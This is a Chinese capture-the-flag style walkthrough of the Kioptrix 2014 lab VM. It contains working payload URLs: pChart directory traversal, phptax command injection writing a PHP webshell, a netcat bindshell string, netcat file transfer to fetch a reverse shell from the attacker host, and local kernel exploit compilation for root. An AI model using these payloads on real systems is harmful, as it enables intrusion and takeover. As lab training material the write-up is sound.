# 靶场搭建

下载: https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2

添加一张 NAT 模式的网卡,IP 地址: 192.168.74.137

# 信息收集

# nmap

快速全端口探测

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds

针对这三个端口进一步探测

┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds

22 端口是关闭的,但是还是探测得到,估计是 8080 端口代理进行的

# 80 页面

打开瞅了一眼 80 端口,在源代码中看到了提示

<head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

看到有 pChart,搜一下有没有漏洞

┌──(root㉿kali)-[~]
└─# searchsploit pchart                                 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                                                                                                   | php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

还真有

# 汇总

  • pChart2.1.3 漏洞
  • Apache2.2.21
  • ssh 暴力破解
  • http 代理(可能是 reGeorge

# 漏洞利用

# pChart

查看漏洞:

┌──(root㉿kali)-[~/Desktop]
└─# cat 31173.txt 
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.
Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.
Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.
[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

看一下具体的漏洞位置,发现是任意文件读取: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

就读到了文件

还有一个 XSS,没啥太大意义

那么现在手里面只有一个文件包含的漏洞,要想办法组合收集更多的信息,通过 LFI 去找信息

目前明确知道机器上运行着 apache,那就去查看配置文件: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf

看到 8080 端口需要通过 Mozilla4_browser 进行访问

┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

看到有一个 phptax 的目录,瞧一眼呢

└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/

出来一堆组件,这个 phptax 估计是个 CMS,直接搜一下攻击模块

msf6 > search phptax
Matching Modules
================
   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/phptax_exec  2012-10-08       excellent  Yes    PhpTax pfilez Parameter Exec Remote Code Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec

# phptax

msf 直接利用没有合适的 payload,这就很傻逼了

searchsploit 查了一下有记录,是有一个 RCE

----------------------------------------------------

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");

// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

----------------------------------------------------

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

----------------------------------------------------

可以看到在 pfilez 参数有 RCE,通过 ; 可以将语句闭合进行执行,给出了 Exp,但是尝试了一下没有办法直接使用,查阅了资料,发现了原因

NC 的 FreeBSD 版本没有附带 execute 选项,这意味着我无法用它获得反向 shell。
参考:https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/

那么想法自然而然就是上传一个 shell 去运行,最简单的就是上传一个一句话: http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make

可以执行系统命令了

wget 目标机器不存在,但是存在 nc,尝试通过 nc 传递数据

# 监听请求
┌──(root㉿kali)-[~]
└─# nc -l -p 8888 < shell.php
# 监听回弹
┌──(root㉿kali)-[~]
└─# nc -lvp 1234

RCE: http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php

写入 shell.php 之后直接访问执行,就会回弹 shell

┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.137] 19685
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     [email protected]:/usr/obj/usr/src/sys/GENERIC  amd64
 3:03AM  up  2:26, 0 users, load averages: 0.11, 0.11, 0.04
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ whoami
www

但是低权限,要提权

# 提权

uname -a 查看一下机器的内核,发现是 FreeBSD 9.0 ,直接 searchsploit 搜一下看看有没有提权脚本,有的,直接传上去,通过他机器上的 gcc 编译出来

http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c

http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c

28718.c 这个提权的方法在目标机器上编译的时候我这里出现了问题,所以我用了另外一个 26368.c

传上去之后直接 gcc 编译,运行 a.out 就直接拿到了 root 权限

$ gcc exp.c
exp.c:89:2: warning: no newline at end of file
$ ./a.out
whoami
root

# 小结

出现了很多次意想不到的情况,自己心里想的方法总是不能如鱼得水的应用,在拿到一句话后,想要反弹 shell,但是由于对工具的不熟悉以及反弹方式底层逻辑的缺失导致浪费了大量时间,目标机器没有 wget 后就不知道该如何进行传递,常用的工具应用的并不像自己认为的那样熟练,还是要加强练习。

一些具体的失败原因仍然没有能力刨根问题,例如提权的过程中为什么 28718.c 编译后无法运行?反弹 shell 的过程中,为什么有很多次没有正常进行会话。这些都需要对操作系统层面和工具的设计以及网络通讯基础具有深刻的理解才能解答。

任重而道远……